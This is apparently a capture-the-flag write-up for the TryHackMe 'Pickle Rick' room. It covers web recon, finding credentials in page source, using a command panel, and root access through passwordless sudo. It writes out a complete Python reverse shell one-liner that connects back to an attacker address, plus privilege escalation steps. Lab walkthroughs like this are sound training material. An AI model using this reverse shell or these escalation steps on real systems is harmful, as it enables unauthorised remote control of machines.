Pickle Rick -THM
Recon:
Let’s start by doing a nmap scan on the given machine to see open ports.
navigating to port 80, and looking at the source code, we get the username as : R1ckRul3s .
On running gobuster, we can see that we have a directory named assets. Let’s go there.
Let’s also go to /robots.txt and see what we can find
Gobuster results :
Let’s try to login with the username and with the string we got as password.
we are met with a panel where we can execute commands, and ‘cat’ doesn’t work!
using tac on clue.txt gives output as:
Look around the file system for the other ingredient.
tac Sup3rS3cretPickl3Ingred.txt
Running this will give you the first ingredient as output.
Now, let’s get a reverse shell to the system using python3 script
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
There we go we have the reverse shell.
make the shell interactive using
/bin/bash -ki
get linpeas.sh file here in this shell and run it, you’ll see sudo can run any commands/tool without a password. or run sudo -l to see permissions
Run :
sudo bash
to get root access and voila, search for the second and third ingredients by navigating to user home directories.
John hammond has a really cool project which makes is easier to transfer files from your system to the machine. check this out without you having to setup netcat and stuff : https://github.com/JohnHammond/poor-mans-pentest/blob/master/upload_file_nc.sh .
Keep hackin!